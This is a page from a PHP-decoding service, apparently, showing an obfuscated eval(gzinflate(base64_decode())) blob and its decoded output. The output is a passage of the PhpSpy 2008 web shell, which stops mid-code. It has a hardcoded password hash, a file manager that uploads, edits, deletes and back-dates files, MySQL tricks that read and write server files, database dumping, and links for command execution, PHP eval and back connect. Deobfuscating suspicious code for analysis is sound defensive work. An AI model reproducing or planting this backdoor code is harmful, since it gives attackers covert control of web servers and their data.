Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode('7b39d1zHcSj4M3yO/ofL0UR3IA7mAwC/AA5IEB8kKBCAMAApksCbnY87gyvM..

Decoded Output download

?><?php
//MSSQL
error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach(array('_GET','_POST') as $_request) {
	foreach($$_request as $_key => $_value) {
		if ($_key{0} != '_') {
			if (IS_GPC) {
				$_value = s_array($_value);
			}
			$$_key = $_value;
		}
	}
}

/*=====================  =====================*/
$admin = array();
// , true , false .
$admin['check'] = true;
// ,
$admin['pass']  = 'c58a38a31796ec548d35277b85b0d2e5';

// cookie , , , 
// cookie 
$admin['cookiepre'] = '';
// cookie 
$admin['cookiedomain'] = '';
// cookie 
$admin['cookiepath'] = '/';
// cookie 
$admin['cookielife'] = 86400;
/*=====================  =====================*/

if ($charset == 'utf8') {
	header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
	header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
	header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
	header("content-Type: text/html; charset=iso-8859-2");
}

$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();

/*=====================  =====================*/
if ($action == "logout") {
	scookie('phpspypass', '', -86400 * 365);
	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
	exit;
}
if($admin['check']) {
	if ($doing == 'login') {
		if ($admin['pass'] == md5($password)) {
			scookie('phpspypass', md5($password));
			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
			exit;
		}
	}
	if ($_COOKIE['phpspypass']) {
		if ($_COOKIE['phpspypass'] != $admin['pass']) {
			loginpage();
		}
	} else {
		loginpage();
	}
}
/*=====================  =====================*/

$errmsg = '';

// PHPINFO
if ($action == 'phpinfo') {
	if (IS_PHPINFO) {
		phpinfo();
		exit;
	} else {
		$errmsg = 'phpinfo() function has non-permissible';
	}
}

// 
if ($doing == 'downfile' && $thefile) {
	if (!@file_exists($thefile)) {
		$errmsg = 'The file you want Downloadable was nonexistent';
	} else {
		$fileinfo = pathinfo($thefile);
		header('Content-type: application/x-'.$fileinfo['extension']);
		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
		header('Content-Length: '.filesize($thefile));
		@readfile($thefile);
		exit;
	}
}

// 
if ($doing == 'backupmysql' && !$saveasfile) {
	mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
	$table = array_flip($table);
	$result = q("SHOW tables");
	if (!$result) p('<h2>'.mysql_error().'</h2>');
	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
	header('Content-type: application/unknown');
	header('Content-Disposition: attachment; filename='.$filename);
	$mysqldata = '';
	while ($currow = mysql_fetch_array($result)) {
		if (isset($table[$currow[0]])) {
			$mysqldata .= sqldumptable($currow[0]);
		}
	}
	mysql_close();
	exit;
}

// MYSQL
if($doing=='mysqldown'){
	if (!$dbname) {
		$errmsg = 'Please input dbname';
	} else {
		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
		if (!file_exists($mysqldlfile)) {
			$errmsg = 'The file you want Downloadable was nonexistent';
		} else {
			$result = q("select load_file('$mysqldlfile');");
			if(!$result){
				q("DROP TABLE IF EXISTS tmp_angel;");
				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
				//,__angel_1111111111_eof__
				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
				$result = q("select content from tmp_angel");
				q("DROP TABLE tmp_angel");
			}
			$row = @mysql_fetch_array($result);
			if (!$row) {
				$errmsg = 'Load file failed '.mysql_error();
			} else {
				$fileinfo = pathinfo($mysqldlfile);
				header('Content-type: application/x-'.$fileinfo['extension']);
				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
				header("Accept-Length: ".strlen($row[0]));
				echo $row[0];
				exit;
			}
		}
	}
}

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
<style type="text/css">
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
</style>
<script type="text/javascript">
function CheckAll(form) {
	for(var i=0;i<form.elements.length;i++) {
		var e = form.elements[i];
		if (e.name != 'chkall')
		e.checked = form.chkall.checked;
    }
}
function $(id) {
	return document.getElementById(id);
}
function goaction(act){
	$('goaction').action.value=act;
	$('goaction').submit();
}
</script>
</head>
<body style="margin:0;table-layout:fixed; word-break:break-all">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
	<tr class="head">
		<td><span style="float:right;"><a href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2008</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
	</tr>
	<tr class="alt1">
		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
			<a href="javascript:goaction('logout');">Logout</a> | 
			<a href="javascript:goaction('file');">File Manager</a> | 
			<a href="javascript:goaction('mysqladmin');">MYSQL Manager</a> | 
			<a href="javascript:goaction('mssqladmin');">MSSQL Manager</a> | 
			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> | 
			<a href="javascript:goaction('shell');">Execute Command</a> | 
			<a href="javascript:goaction('phpenv');">PHP Variable</a> | 
			<a href="javascript:goaction('eval');">Eval PHP Code</a>
			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
		</td>
	</tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<?php

formhead(array('name'=>'goaction'));
makehide('action');
formfoot();

$errmsg && m($errmsg);

// 
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
	$dir = $dir.'/';
}
$uedir = ue($dir);

if (!$action || $action == 'file') {

	// 
	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

	// 
	if ($doing == 'deldir' && $thefile) {
		if (!file_exists($thefile)) {
			m($thefile.' directory does not exist');
		} else {
			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
		}
	}

	// 
	elseif ($newdirname) {
		$mkdirs = $nowpath.$newdirname;
		if (file_exists($mkdirs)) {
			m('Directory has already existed');
		} else {
			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
			@chmod($mkdirs,0777);
		}
	}

	// 
	elseif ($doupfile) {
		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
	}

	// 
	elseif ($editfilename && $filecontent) {
		$fp = @fopen($editfilename,'w');
		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
		@fclose($fp);
	}

	// 
	elseif ($pfile && $newperm) {
		if (!file_exists($pfile)) {
			m('The original file does not exist');
		} else {
			$newperm = base_convert($newperm,8,10);
			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
		}
	}

	// 
	elseif ($oldname && $newfilename) {
		$nname = $nowpath.$newfilename;
		if (file_exists($nname) || !file_exists($oldname)) {
			m($nname.' has already existed or original file does not exist');
		} else {
			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
		}
	}

	// 
	elseif ($sname && $tofile) {
		if (file_exists($tofile) || !file_exists($sname)) {
			m('The goal file has already existed or original file does not exist');
		} else {
			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
		}
	}

	// 
	elseif ($curfile && $tarfile) {
		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
			m('The goal file has already existed or original file does not exist');
		} else {
			$time = @filemtime($tarfile);
			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
		}
	}

	// 
	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
		if (!@file_exists($curfile)) {
			m(basename($curfile).' does not exist');
		} else {
			$time = strtotime("$year-$month-$day $hour:$minute:$second");
			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
		}
	}

	// 
	elseif($doing == 'downrar') {
		if ($dl) {
			$dfiles='';
			foreach ($dl as $filepath => $value) {
				$dfiles.=$filepath.',';
			}
			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
			$dl=explode(',',$dfiles);
			$zip=new PHPZip($dl);
			$code=$zip->out;
			header('Content-type: application/octet-stream');
			header('Accept-Ranges: bytes');
			header('Accept-Length: '.strlen($code));
			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
			echo $code;
			exit;
		} else {
			m('Please select file(s)');
		}
	}

	// 
	elseif($doing == 'delfiles') {
		if ($dl) {
			$dfiles='';
			$succ = $fail = 0;
			foreach ($dl as $filepath => $value) {
				if (@unlink($filepath)) {
					$succ++;
				} else {
					$fail++;
				}
			}
			m('Deleted file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
		} else {
			m('Please select file(s)');
		}
	}

	//
	formhead(array('name'=>'createdir'));
	makehide('newdirname');
	makehide('dir',$nowpath);
	formfoot();
	formhead(array('name'=>'fileperm'));
	makehide('newperm');
	makehide('pfile');
	makehide('dir',$nowpath);
	formfoot();
	formhead(array('name'=>'copyfile'));
	makehide('sname');
	makehide('tofile');
	makehide('dir',$nowpath);
	formfoot();
	formhead(array('name'=>'rename'));
	makehide('oldname');
	makehide('newfilename');
	makehide('dir',$nowpath);
	formfoot();
	formhead(array('name'=>'fileopform'));
	makehide('action');
	makehide('opfile');
	makehide('dir');
	formfoot();
	formhead(array('name'=>'getsize'));
	makehide('getdir');
	makehide('dir');
	formfoot();

	$free = @disk_free_space($nowpath);
	!$free && $free = 0;
	$all = @disk_total_space($nowpath);
	!$all && $all = 0;
	$used = $all-$free;
	$used_percent = @round(100/($all/$free),2);
	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');

?>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  <form action="" method="post" id="godir" name="godir">
  <tr>
    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
    <td nowrap><input class="bt" value="GO" type="submit"></td>
  </tr>
  </form>
</table>
<script type="text/javascript">
function createdir(){
	var newdirname;
	newdirname = prompt('Please input the directory name:', '');
	if (!newdirname) return;
	$('createdir').newdirname.value=newdirname;
	$('createdir').submit();
}
function fileperm(pfile){
	var newperm;
	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
	if (!newperm) return;
	$('fileperm').newperm.value=newperm;
	$('fileperm').pfile.value=pfile;
	$('fileperm').submit();
}
function copyfile(sname){
	var tofile;
	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
	if (!tofile) return;
	$('copyfile').tofile.value=tofile;
	$('copyfile').sname.value=sname;
	$('copyfile').submit();
}
function rename(oldname){
	var newfilename;
	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
	if (!newfilename) return;
	$('rename').newfilename.value=newfilename;
	$('rename').oldname.value=oldname;
	$('rename').submit();
}
function dofile(doing,thefile,m){
	if (m && !confirm(m)) {
		return;
	}
	$('filelist').doing.value=doing;
	if (thefile){
		$('filelist').thefile.value=thefile;
	}
	$('filelist').submit();
}
function createfile(nowpath){
	var filename;
	filename = prompt('Please input the file name:', '');
	if (!filename) return;
	opfile('editfile',nowpath + filename,nowpath);
}
function opfile(action,opfile,dir){
	$('fileopform').action.value=action;
	$('fileopform').opfile.value=opfile;
	$('fileopform').dir.value=dir;
	$('fileopform').submit();
}
function godir(dir,view_writable){
	if (view_writable) {
		$('godir').view_writable.value=1;
	}
	$('godir').dir.value=dir;
	$('godir').submit();
}
function getsize(getdir,dir){
	$('getsize').getdir.value=getdir;
	$('getsize').dir.value=dir;
	$('getsize').submit();
}
</script>
  <?php
	tbhead();
	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
	p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
	if ($view_writable) {
		p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
	} else {
		p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
	}
	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
	if (IS_WIN && IS_COM) {
		$obj = new COM('scripting.filesystemobject');
		if ($obj && is_object($obj) && is_array($obj->Drives)) {
			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
			foreach($obj->Drives as $drive) {
				if ($drive->DriveType == 2) {
					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
				} else {
					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
				}
			}
		}
	}

	p('</td></tr></form>');

	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');

	//
	$dirdata=array();
	$filedata=array();

	if ($view_writable) {
		$dirdata = GetList($nowpath);
	} else {
		// 
		$dirs=@opendir($dir);
		while ($file=@readdir($dirs)) {
			$filepath=$nowpath.$file;
			if(@is_dir($filepath)){
				$dirdb['filename']=$file;
				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
				$dirdb['dirchmod']=getChmod($filepath);
				$dirdb['dirperm']=getPerms($filepath);
				$dirdb['fileowner']=getUser($filepath);
				$dirdb['dirlink']=$nowpath;
				$dirdb['server_link']=$filepath;
				$dirdb['client_link']=ue($filepath);
				$dirdata[]=$dirdb;
			} else {		
				$filedb['filename']=$file;
				$filedb['size']=sizecount(@filesize($filepath));
				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
				$filedb['filechmod']=getChmod($filepath);
				$filedb['fileperm']=getPerms($filepath);
				$filedb['fileowner']=getUser($filepath);
				$filedb['dirlink']=$nowpath;
				$filedb['server_link']=$filepath;
				$filedb['client_link']=ue($filepath);
				$filedata[]=$filedb;
			}
		}// while
		unset($dirdb);
		unset($filedb);
		@closedir($dirs);
	}
	@sort($dirdata);
	@sort($filedata);
	$dir_i = '0';

	foreach($dirdata as $key => $dirdb){
		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
			if($getdir && $getdir == $dirdb['server_link']) {
				$attachsize = dirsize($dirdb['server_link']);
				$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
			} else {
				$attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
			}
			$thisbg = bg();
			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
			p('<td nowrap>'.$dirdb['mtime'].'</td>');
			p('<td nowrap>'.$attachsize.'</td>');
			p('<td nowrap>');
			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
			p('</tr>');
			$dir_i++;
		} else {
			if($dirdb['filename']=='..') {
				p('<tr class='.bg().'>');
				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
				p('</tr>');
			}
		}
	}

	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
	makehide('action','file');
	makehide('thefile');
	makehide('doing');
	makehide('dir',$nowpath);
	$file_i = '0';
	foreach($filedata as $key => $filedb){
		if($filedb['filename']!='..' && $filedb['filename']!='.') {
			$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
			$thisbg = bg();
			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
			p('<td nowrap>'.$filedb['mtime'].'</td>');
			p('<td nowrap>'.$filedb['size'].'</td>');
			p('<td nowrap>');
			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
			p('<td nowrap>');
			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
			p('</td></tr>');
			$file_i++;
		}
	}
	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
	p('</form></table>');
}// end dir

elseif ($action == 'sqlfile') {
	if($doing=="mysqlupload"){
		$file = $_FILES['uploadfile'];
		$filename = $file['tmp_name'];
		if (file_exists($savepath)) {
			m('The goal file has already existed');
		} else {
			if(!$filename) {
				m('Please choose a file');
			} else {
				$fp=@fopen($filename,'r');
				$contents=@fread($fp, filesize($filename));
				@fclose($fp);
				$contents = bin2hex($contents);
				if(!$upname) $upname = $file['name'];
				mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
			}
		}
	}
?>
<script type="text/javascript">
function mysqlfile(doing){
	if(!doing) return;
	$('doing').value=doing;
	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
	$('mysqlfile').charset.value=$('dbinfo').charset.value;
	$('mysqlfile').submit();
}
</script>
<?php
	!$dbhost && $dbhost = 'localhost';
	!$dbuser && $dbuser = 'root';
	!$dbport && $dbport = '3306';
	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
	makehide('action','sqlfile');
	p('<p>');
	p('DBHost:');
	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
	p(':');
	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
	p('DBUser:');
	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
	p('DBPass:');
	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
	p('DBName:');
	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
	p('DBCharset:');
	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
	p('</p>');
	formfoot();
	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
	p('<h2>Upload file</h2>');
	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
	p('<h2>Download file</h2>');
	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
	makehide('dbhost');
	makehide('dbport');
	makehide('dbuser');
	makehide('dbpass');
	makehide('dbname');
	makehide('charset');
	makehide('doing');
	makehide('action','sqlfile');
	p('</form>');
}

elseif ($action == 'mysqladmin') {
	!$dbhost && $dbhost = 'localhost';
	!$dbuser && $dbuser = 'root';
	!$dbport && $dbport = '3306';
	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
	if(isset($dbhost)){
		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
	}
	if(isset($dbuser)) {
		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
	}
	if(isset($dbpass)) {
		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
	}
	if(isset($dbport)) {
		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
	}
	if(isset($dbname)) {
		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
	}
	if(isset($charset)) {
		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
	}

	if ($doing == 'backupmysql' && $saveasfile) {
		if (!$table) {
			m('Please choose the table');
		} else {
			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
			$table = array_flip($table);
			$fp = @fopen($path,'w');
			if ($fp) {
				$result = q('SHOW tables');
				if (!$result) p('<h2>'.mysql_error().'</h2>');
				$mysqldata = '';
				while ($currow = mysql_fetch_array($result)) {
					if (isset($table[$currow[0]])) {
						sqldumptable($currow[0], $fp);
					}
				}
				fclose($fp);
				$fileurl = str_replace(SA_ROOT,'',$path);
				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
				mysql_close();
			} else {
				m('Backup failed');
			}
		}
	}
	if ($insert && $insertsql) {
		$keystr = $valstr = $tmp = '';
		foreach($insertsql as $key => $val) {
			if ($val) {
				$keystr .= $tmp.$key;
				$valstr .= $tmp."'".addslashes($val)."'";
				$tmp = ',';
			}
		}
		if ($keystr && $valstr) {
			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
		}
	}
	if ($update && $insertsql && $base64) {
		$valstr = $tmp = '';
		foreach($insertsql as $key => $val) {
			$valstr .= $tmp.$key."='".addslashes($val)."'";
			$tmp = ',';
		}
		if ($valstr) {
			$where = base64_decode($base64);
			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
		}
	}
	if ($doing == 'del' && $base64) {
		$where = base64_decode($base64);
		$delete_sql = "DELETE FROM $tablename WHERE $where";
		mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
	}

	if ($tablename && $doing == 'drop') {
		mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
		if (q("DROP TABLE $tablename")) {
			m('Drop table of success');
			$tablename = '';
		} else {
			m(mysql_error());
		}
	}

	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');

	formhead(array('title'=>'MYSQL Manager'));
	makehide('action','mysqladmin');
	p('<p>');
	p('DBHost:');
	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
	p(':');
	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
	p('DBUser:');
	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
	p('DBPass:');
	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
	p('DBCharset:');
	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
	p('</p>');
	formfoot();
?>
<script type="text/javascript">
function editrecord(action, base64, tablename){
	if (action == 'del') {		
		if (!confirm('Is or isn\'t deletion record?')) return;
	}
	$('recordlist').doing.value=action;
	$('recordlist').base64.value=base64;
	$('recordlist').tablename.value=tablename;
	$('recordlist').submit();
}
function moddbname(dbname) {
	if(!dbname) return;
	$('setdbname').dbname.value=dbname;
	$('setdbname').submit();
}
function settable(tablename,doing,page) {
	if(!tablename) return;
	if (doing) {
		$('settable').doing.value=doing;
	}
	if (page) {
		$('settable').page.value=page;
	}
	$('settable').tablename.value=tablename;
	$('settable').submit();
}
</script>
<?php
	//
	formhead(array('name'=>'recordlist'));
	makehide('doing');
	makehide('action','mysqladmin');
	makehide('base64');
	makehide('tablename');
	p($dbform);
	formfoot();

	//
	formhead(array('name'=>'setdbname'));
	makehide('action','mysqladmin');
	p($dbform);
	if (!$dbname) {
		makehide('dbname');
	}
	formfoot();

	//
	formhead(array('name'=>'settable'));
	makehide('action','mysqladmin');
	p($dbform);
	makehide('tablename');
	makehide('page',$page);
	makehide('doing');
	formfoot();

	$cachetables = array();	
	$pagenum = 30;
	$page = intval($page);
	if($page) {
		$start_limit = ($page - 1) * $pagenum;
	} else {
		$start_limit = 0;
		$page = 1;
	}
	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
		//
		$mysqlver = mysql_get_server_info();
		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
		$highver = $mysqlver > '4.1' ? 1 : 0;

		//
		$query = q("SHOW DATABASES");
		$dbs = array();
		$dbs[] = '-- Select a database --';
		while($db = mysql_fetch_array($query)) {
			$dbs[$db['Database']] = $db['Database'];
		}
